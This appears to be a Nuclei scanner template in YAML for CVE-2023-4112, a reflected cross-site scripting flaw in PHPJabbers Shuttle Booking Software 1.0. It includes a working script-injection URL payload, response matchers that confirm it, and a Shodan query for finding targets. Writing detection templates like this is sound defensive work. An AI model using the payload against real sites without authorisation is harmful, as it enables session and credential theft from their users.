43 lines
1.7 KiB
YAML
43 lines
1.7 KiB
YAML
id: CVE-2023-4112
|
|
|
|
info:
|
|
name: PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
|
|
reference:
|
|
- https://www.exploitalert.com/view-details.html?id=39750
|
|
- https://cxsecurity.com/ascii/WLB-2023080012
|
|
- http://packetstormsecurity.com/files/173930/PHPJabbers-Shuttle-Booking-Software-1.0-Cross-Site-Scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4112
|
|
- https://vuldb.com/?ctiid.235959
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-4112
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00229
|
|
epss-percentile: 0.60385
|
|
cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: phpjabbers
|
|
product: shuttle_booking_software
|
|
shodan-query: html:"PHP Jabbers.com"
|
|
tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body, "PHPJabbers") && contains(body, "><script>alert(document.domain)</script>")'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 490a00463044022018c2cd802d511a3ec6b3a5e13a8ef5069df64208c7bd9f7ef8fe07e54510f4ef02206d9261b2d4c426dea6831bab220898c4613025136f1f8bed4cdba7e34beb8f88:922c64590222798bb761d5b6d8e72950 |